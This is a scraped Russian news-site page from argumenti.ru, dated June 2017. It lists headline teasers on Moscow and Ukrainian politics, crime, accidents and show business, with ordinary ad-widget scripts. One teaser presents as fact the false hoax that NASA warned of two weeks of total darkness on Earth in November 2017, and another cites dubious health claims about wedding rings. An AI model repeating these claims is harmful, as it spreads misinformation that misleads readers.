	<img src="http://argumenti.ru/images/preview/arhnews/775807c828578aed7481d6e9ce764491.jpg" alt="В рамках программы реновации в Москве на крышах домов появятся сады" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539712">В рамках программы реновации в Москве на крышах домов появятся сады</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539712">При строительстве домов по программе реновации власти Москвы будут широко использовать программы по озеленению крыш. На них появятся березы и дикие травы. Также применят технологии по вертикальному озеленению.

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/3cb16703d414adefb47bc7d44ac00b23.jpg" alt="Новые станции метро Фрунзенского радиуса откроют в начале следующего года" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539714">Новые станции метро Фрунзенского радиуса откроют в начале следующего года</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539714">В первом квартале следующего года планируется открытие трех новых  станций петербургского метрополитена: «Дунайский проспект», «Проспект Славы» и «Шушары».

</a></div>		</div>
	</div>	



<div class="mainrub">
		<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>
	



	<img src="http://argumenti.ru/images/preview/arhnews/bd6a9b7d63caccb55c039584fc05d1a4.jpg" alt="В базу &quot;Миротворца&quot; попала порноактриса Катя Самбука" />
	
<p class="maxititle"><a href="http://argumenti.ru/society/2017/06/539746">В базу &quot;Миротворца&quot; попала порноактриса Катя Самбука</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539746">Порнозвезда Катя Самбука (в миру – Екатерина Долгова) выступила в Севастополе и этого оказалось достаточным, чтобы ей запретили въезд на Украину. Актриса попала в базу украинского сайта «Миротворец».</a></div>	</div>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/4e44824f2ce53b81903b5c889e320b12.jpg" alt="Депутаты Украины готовят импичмент Порошенко" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/06/539678">Депутаты Украины готовят импичмент Порошенко</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/06/539678">Депутаты Верховной Рады Украины обсуждают возможный импичмент президента Украины Петра Порошенко.
Инициатива принадлежит фракции партии "Батькивщина" во главе с Юлией Тимошенко. 
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/army">Армия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/b7a86ae7072f6fe46b3436fa02c8f851.jpg" alt="Путин поручил обдумать увеличение предельного возраста для военной службы" />
	

<p class="minititle"><a href="http://argumenti.ru/army/2017/06/539721">Путин поручил обдумать увеличение предельного возраста для военной службы</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/army/2017/06/539721">Глава государства Владимир Путин поручил Министерству обороны вместе с другими органами исполнительной власти рассмотреть вопрос о возможности увеличения предельного возраста пребывания на военной службе.
</a></div>		</div>
	</div>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c9eaeb2a8e3fffa8efca7c4cbb065ec3.jpg" alt="В Еврокомиссии заявили об отсутствии подготовки к введению новых санкций" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/06/539711">В Еврокомиссии заявили об отсутствии подготовки к введению новых санкций</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/06/539711">Об этом вице-президент Еврокомиссии Марош Шефчович сообщил, общаясь с журналистами. Кроме того, Шефчович рассказал, что Вашингтон не координировал с Евросоюзом возможное введение новых ограничительных мер.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c5e40fdfa1e251b85bbd7a09ce31dd66.jpg" alt="Лавров заявил об отсутствии у России планов по нападению на НАТО" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/06/539740">Лавров заявил об отсутствии у России планов по нападению на НАТО</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/06/539740">Регулярные заявления иностранных политиков о «российской угрозе» являются предлогом для усиления присутствия Североатлантического альянса на границах с РФ. Глава МИД России уверен, что этот предлог выдуманный. </a></div>		</div>
	</div>
<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>
	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/2f7ac2b79cbdb8e92434a7b0f8d9b571.jpg" alt="Полиция Лондона назвала причину пожара в высотке: холодильник" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/06/539728">Полиция Лондона назвала причину пожара в высотке: холодильник</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/06/539728">Причиной пожара в лондонском небоскребе Grenfell Tower, унесшего жизни 79 человек, стал неисправный холодильник. Об этом в пятницу, 23 июня, со ссылкой на полицейский отчет сообщает BBC News.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/991cdbeacdec57bc279cdc982343a0e5.jpg" alt="Экспертиза не выявила наличие алкоголя в организме &laquo;пьяного&raquo; мальчика" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539730">Экспертиза не выявила наличие алкоголя в организме &laquo;пьяного&raquo; мальчика</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539730">В интернете появилось отсканированное заключение экспертов, в котором говорится о том, что установить наличие алкоголя в организме погибшего в ДТП в Подмосковье 6-летнего мальчика не представляется возможным.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/6a30437ca0e6af6df06159c22497aa4d.jpg" alt="NASA: Земля в ноябре на две недели погрузится в полную темноту" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2017/06/539694">NASA: Земля в ноябре на две недели погрузится в полную темноту</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2017/06/539694">Астрономическое сообщество из международного аэрокосмического агентства NASA предупредило человечество, что с 15 по 29 ноября 2017 года Земля погрузится в тьму. Соответствующий документ уже отправлен в Белый дом США.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/730b139b7aa48295484d316ae3d0bdcc.jpg" alt="Виторган попросил Собчак скрывать измены до последнего" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/06/539716">Виторган попросил Собчак скрывать измены до последнего</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/06/539716">Недавно Ксения призналась в том, что у неё с мужем есть определенная договоренность об изменах. 35-летняя телеведущая и Максим Виторган условились в случае свершившегося факта неверности никогда не рассказывать о нем. 



</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/3f56bf0a797128cfae32663acbb34136.jpg" alt="Москвич жестоко расправился со своей любовницей" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/06/539744">Москвич жестоко расправился со своей любовницей</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/06/539744">Трагедия произошла в Зеленограде Московской области 23 июня. 35-летний мужчина с помощью бейсбольной биты расправился со своей сожительницей. Дама скончалась на месте происшествия от полученных травм.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/culture">Культура</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/6955c3545b58876849457af4a3f3f2b8.jpg" alt="Ансамбль солистов-виртуозов Philharmonix выступит в Москве" />
	

<p class="minititle"><a href="http://argumenti.ru/culture/2017/06/539745">Ансамбль солистов-виртуозов Philharmonix выступит в Москве</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/culture/2017/06/539745">Концерт ансамбля Philharmonix состоится в КЗ имени Чайковского 25 июня 2017 года.Ансамбль объединяет трех cолистов-виртуозов Венского филармонического оркестра, двух ведущих солистов Берлинской филармонии, одного из самых разносторонних австрийских пианистов, а также скрипача из Австрии.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/3ed06e52bcc9b0a84a48de2cda938847.jpg" alt="Полиция опровергла проведение повторной экспертизы по делу &laquo;пьяного&raquo; мальчика" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539742">Полиция опровергла проведение повторной экспертизы по делу &laquo;пьяного&raquo; мальчика</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539742">Информация о проведении повторной экспертизы, по итогам которой в крови погибшего под колесами иномарки 6-летнего мальчика не нашли алкоголя, не соответствует действительности. Об этом заявили в МВД.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/0e0ba8660a0be1062473fe9cbd6bf809.jpg" alt="ЦИК РФ: Алексей Навальный не имеет права участвовать в выборах как кандидат" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539743">ЦИК РФ: Алексей Навальный не имеет права участвовать в выборах как кандидат</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539743">В российском Центризбиркоме 23 июня заявили журналистам, что оппозиционер Алексей Навальный не имеет права избираться и его участие в президентской гонке как одного из кандидатов будет незаконно.</a></div>		</div>
	</div>



	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/cd679f9333f159a7d907dc376f60b66e.jpg" alt="В Москве задержан авторитетный вор в законе" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/06/539741">В Москве задержан авторитетный вор в законе</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/06/539741">Вор в законе Ткач Няганьский, а по паспорту - 37-летний Андрей Ткаченко, 23 июня задержан оперативниками уголовного розыска Москвы при поддержке бойцов Росгвардии в одном из столичных ресторанов.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/5cc51567cae54fca227a33d298d1f893.jpg" alt="В Подмосковье появится новый вид экскурсий - на заводы по переработке мусора" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539738">В Подмосковье появится новый вид экскурсий - на заводы по переработке мусора</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539738">Ранее «Аргументы недели» сообщали о планах властей Подмосковья открыть первый в регионе завод по переработке мусора. Но власти Московской области решили пойти дальше и открыть экскурсии на подобные заводы.</a></div>		</div>
	</div>




	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/live">live</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/f78eb3d2d76e0e4b1c5efd7dbaba53c0.jpg" alt="&laquo;Не только в Подмосковье, но и Москве накоплены миллиарды кубометров мусора!&raquo;" />
	

<p class="minititle"><a href="http://argumenti.ru/live/2017/06/539739">&laquo;Не только в Подмосковье, но и Москве накоплены миллиарды кубометров мусора!&raquo;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/live/2017/06/539739">Власти Подмосковья считают, что Балашихе нужны два мусороперерабатывающих завода. Напомним, что Владимир Путин поставил задачу - закрыть в течение месяца свалку в Балашихе. Вопрос: «Мусор не надо оставлять на долгую память?» </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a6b94c3176fecd8fcd7192732e46dc38.jpg" alt="Дуров обвинил Роскомнадзор в саботаже государственных интересов" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539736">Дуров обвинил Роскомнадзор в саботаже государственных интересов</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539736">В своем посте в социальной сети предприниматель удивился тому, что власти РФ собираются запретить «нейтральный по отношению к России» Telegram, а не его западные аналоги, контролирующиеся США. </a></div>		</div>
	</div>

	<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>


	<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14115">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14115/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ed8ec0ff97e7a688daf15d567eb6c91d.jpg" alt="На Кубани чиновник жестоко избил сотрудника ФСБ" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/06/539737">На Кубани чиновник жестоко избил сотрудника ФСБ</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/06/539737">Сотрудник погранслужбы на Черноморском побережье Кубани выполнял свою работу и хотел проверить документы на лодку, но хозяин плавсредства, местный чиновник, так рассвирепел, что избил палкой пограничника.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/793d9f7eefe137723c7641f30c9ac2cb.png" alt="В Мурманской области убийцы школьника заслушали судебный приговор" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/06/539734">В Мурманской области убийцы школьника заслушали судебный приговор</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/06/539734">За жестокое убийство 16-летнего подростка в городе Кола (Мурманская область) 23 июня отправлены в тюрьму молодой парень и юная девушка. Убийство мальчика произошло из-за обычной словесной перепалки.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/5edbc7a88e1698f4d36d70497c66297f.jpg" alt="СМИ узнали о разработке США направленной против России &laquo;цифровой бомбы&raquo;" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/06/539733">СМИ узнали о разработке США направленной против России &laquo;цифровой бомбы&raquo;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/06/539733">В США изготовлена «цифровая бомба», которая в любой момент может быть использована против России. Об этом узнали американские СМИ. Речь идет о размещении кибероружия в системах инфраструктуры РФ. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/64a57a782ae12947f2e2a753eb02984e.jpg" alt="Володин призвал депутатов не пугать россиян отменой новогодних каникул" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539731">Володин призвал депутатов не пугать россиян отменой новогодних каникул</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539731">Ранее в четверг стало известно, что представители фракции КПРФ внесли на рассмотрение Государственной Думы законопроект, который предлагает изменить количество праздничных дней в Российской Федерации. </a></div>		</div>
	</div>




	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d1808fe9a04c8d89acb6c3ac9c59b350.jpg" alt="Каждый третий россиянин считает необходимым введение визового режима с Украиной" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539729">Каждый третий россиянин считает необходимым введение визового режима с Украиной</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539729">Больше трети россиян поддержали введение визового режима с Украиной. По опросу «Левада-Центра» подавляющее большинство так или иначе следит за происходящее в соседнем государстве. 
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ab1128ae1b11cccad7dbdc3a7ef3700e.jpg" alt="Савченко рассказала об обмене нецензурными жестами с Гройсманом в Раде" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/06/539727">Савченко рассказала об обмене нецензурными жестами с Гройсманом в Раде</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/06/539727">Надежда Савченко рассказала, зачем она показала средний палец Владимиру Гройсману во время заседания Верховной Рады. О нецензурном жесте, который позволила себе депутат, украинские издания сообщили ранее. </a></div>		</div>
	</div>



	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a6fbc23ca35af140ecfbc638dc99b546.jpg" alt="В столичном метро загорелся новый поезд &laquo;Москва&raquo;" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/06/539726">В столичном метро загорелся новый поезд &laquo;Москва&raquo;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/06/539726">В московской подземке утром загорелся состав типа «Москва», такие составы движутся по Таганско-Краснопресненской линии. Инцидент произошёл при попытке тронуться со станции.

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/82221a4de02e502eebbb0b087a7c85da.jpg" alt="Экс-глава украинской разведки рассказал о сторонниках РФ в окружении Порошенко" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/06/539725">Экс-глава украинской разведки рассказал о сторонниках РФ в окружении Порошенко</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/06/539725">В окружении президента Украины Петра Порошенко есть немало людей, которые являются сторонниками России. Об этом украинской прессе заявил Николай Маломуж, бывший руководитель Службы внешней разведки страны.</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/76300a277dd6f66a3d833b1597bd32a1.jpg" alt="Дима Билан высказался о взятках на шоу &quot;Голос&quot;" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/06/539724">Дима Билан высказался о взятках на шоу &quot;Голос&quot;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/06/539724">Российский поп-исполнитель Дима Билан побеседовал с журналистами о шоу "Голос". По словам звезды, на телепроекте родители участников не предлагали организаторам деньги за успехи их детей.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/927062d36704754e1c3edaf034a0ac71.jpg" alt="Крымский бензин и немецкие рояли" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539719">Крымский бензин и немецкие рояли</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539719">И снова заговорили про дорогущий бензин в Крыму. И снова Сергей АКСЕНОВ обещает разобраться и принять меры. И снова будут виноваты нефтетрейдеры. И снова топливо будет дорожать.</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/health">Здоровье</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d1c33b9b9d0c74053701a20012235b22.jpg" alt="Оказывается, обручальные кольца плохо влияют на здоровье мужчин" />
	

<p class="minititle"><a href="http://argumenti.ru/health/2017/06/539718">Оказывается, обручальные кольца плохо влияют на здоровье мужчин</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/health/2017/06/539718">Ученые предупреждают: обручальные кольца опасны для здоровья мужчин. Связывают это с тем, что со временем драгоценный металл начинает окисляться и выделять продукты химической реакции.

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/meteo">Метеоновости</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/488bb85cdcb244bcfdc464481f793994.jpg" alt="МЧС предупредило жителей Москвы о приближении грозы и града" />
	

<p class="minititle"><a href="http://argumenti.ru/meteo/2017/06/539717">МЧС предупредило жителей Москвы о приближении грозы и града</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/meteo/2017/06/539717">Как сообщили некоторое время назад в МЧС, на российскую столицу надвигается гроза. Также метеорологи прогнозируют выпадение града и усиление ветра. Местами его порывы достигнут 17 метров в секунду.</a></div>		</div>
	</div>	
		<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/446c22093fe0d73713df48bc13a80e90.jpg" alt="Лавров заявил о намерении Москвы отстаивать георгиевскую ленту за рубежом" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/06/539713">Лавров заявил о намерении Москвы отстаивать георгиевскую ленту за рубежом</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/06/539713">Так глава МИД РФ прокомментировал инцидент, произошедший накануне в украинском городе Днепр. Местная полиция отчиталась о задержании женщины, которая пришла на памятную акцию с георгиевской лентой. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d64354eb511c56416ba807478ce21760.jpg" alt="Монету номиналом 50 тысяч рублей отчеканили на петербургском Монетном дворе" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539715">Монету номиналом 50 тысяч рублей отчеканили на петербургском Монетном дворе</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539715">Петербургский Монетный двор представил самую дорогую монету в России номиналом 50 тысяч рублей. Она изготовлена из золота 999-ой пробы и весит пять килограммов.
</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/775807c828578aed7481d6e9ce764491.jpg" alt="В рамках программы реновации в Москве на крышах домов появятся сады" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539712">В рамках программы реновации в Москве на крышах домов появятся сады</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539712">При строительстве домов по программе реновации власти Москвы будут широко использовать программы по озеленению крыш. На них появятся березы и дикие травы. Также применят технологии по вертикальному озеленению.

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/3cb16703d414adefb47bc7d44ac00b23.jpg" alt="Новые станции метро Фрунзенского радиуса откроют в начале следующего года" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539714">Новые станции метро Фрунзенского радиуса откроют в начале следующего года</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539714">В первом квартале следующего года планируется открытие трех новых  станций петербургского метрополитена: «Дунайский проспект», «Проспект Славы» и «Шушары».

</a></div>		</div>
	</div>		</section>
	</div>

			<div style="margin-top: 8px;" class="right">

<div class="adv_corp">
		<div id="smi2adblock_45368"><a href="http://smi2.ru/" rel="nofollow">Новости СМИ2</a></div>
<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/45368.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>

</div>
		<script>
	$(document).ready(function(){
		$(".auth_but").click(function(){
		$(".a").toggle();
		$(".auth_but").toggle();
	});
});
</script>

	<h2 class="newsrub"><span class="rem">//</span>Авторы АН</h2>
	<div id="authors">
					<div class="author">
												<a href="http://argumenti.ru/authors/uglanov"><img src="http://argumenti.ru/images/authors/18919e6512ca050243ca6758f0d3ae40.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/uglanov">Андрей Угланов</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/politics/n595/539529">Федеральное собрание не должно быть филиалом конгресса США</a></p>
			</div>
					<div class="author">
												<a href="http://argumenti.ru/authors/moskvina"><img src="http://argumenti.ru/images/authors/68b5a0cec33d5790ced5dbf530b53cda.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/moskvina">Татьяна Москвина</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/culture/n595/539645">Умом Прилепина не понять</a></p>
			</div>
					<div class="author">
												<a href="http://argumenti.ru/authors/Krestiyaninov"><img src="http://argumenti.ru/images/authors/d82c89f68b4166b1aca801aef9299d80.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/Krestiyaninov">Виктор Крестьянинов</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/politics/n595/539594">Мумия не возвращается &ndash; из Терезы Мэй не получилось &laquo;железной леди&raquo;</a></p>
			</div>
					<div class="author">
												<a href="http://argumenti.ru/authors/gurdin"><img src="http://argumenti.ru/images/authors/4c145198cfaa439093dc3fe9c702628e.jpg" alt="" /></a>
				<p class="auth_title"><a href="http://argumenti.ru/authors/gurdin">Константин Гурдин</a></p>
				<p class="auth_anons"><a href="http://argumenti.ru/politics/n595/539541">Федеральное собрание не должно быть филиалом конгресса США</a></p>
			</div>
						
	</div>	



	<div id="authors">

													<div class="a author">
																		<a href="http://argumenti.ru/authors/leonov"><img src="http://argumenti.ru/images/authors/713b23e010290cbe2897d9d2287532ac.jpg" alt="Владимир Леонов" /></a>
						<p class="auth_title"><a href="http://argumenti.ru/authors/leonov">Владимир Леонов</a></p>
						<p class="auth_anons"><a href="http://argumenti.ru/society/n595/539615">Френч канкан</a></p>
					</div>
																		<div class="a author">
																		<a href="http://argumenti.ru/authors/tchuykov"><img src="http://argumenti.ru/images/authors/53a57ea5a54087725200bc171897e697.jpg" alt="Александр Чуйков" /></a>
						<p class="auth_title"><a href="http://argumenti.ru/authors/tchuykov">Александр Чуйков</a></p>
						<p class="auth_anons"><a href="http://argumenti.ru/society/n595/539547">Доживём ли до нового курса Путина?</a></p>
					</div>
																		<div class="a author">
																		<a href="http://argumenti.ru/authors/ryazanov"><img src="http://argumenti.ru/images/authors/8941e3fe0828997c7877c9b05db1b2d2.jpg" alt="Сергей Рязанов" /></a>
						<p class="auth_title"><a href="http://argumenti.ru/authors/ryazanov">Сергей Рязанов</a></p>
						<p class="auth_anons"><a href="http://argumenti.ru/culture/n594/538719">&laquo;А на левой груди&nbsp;&ndash;  профиль Сталина&hellip;&raquo;</a></p>
					</div>
						
</div>
<p class="auth_but">Все авторы >></p>
<p class="auth_but" style="display:none;"><< Скрыть всех авторов</p>
		


		<h2 class="newsrub"><span class="rem">//</span><a href="http://argumenti.ru/culture/muzpodarok/">Музподарок от Юры Валова</a></h2>
	<ul class="minf_anons" style="background-color: #69C;">
	<li style="border: none;">
																<!--<a href="http://argumenti.ru/culture/2017/01/518064?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=" style="color: white;" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/2b9183819bc8c8eb6c1c57457f78dfbe.jpg" width="70" height="70" alt="Музподарок от Юрия Валова: Со всеми прошедшими и со Старым Новым Роком&hellip;" />-->
								<a href="http://argumenti.ru/culture/2017/01/518064?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=" style="color: white;" target="_self"><img src="http://www.argumenti.ru/pub/images/images_sl/valov.jpeg" width="70" height="70" alt="Музподарок от Юрия Валова: Со всеми прошедшими и со Старым Новым Роком&hellip;" />
														<p class="live">Live</p>
							<p>Со всеми прошедшими и со Старым Новым Роком&hellip;</p></a>
							
						</li>			


		</ul>		<noindex>
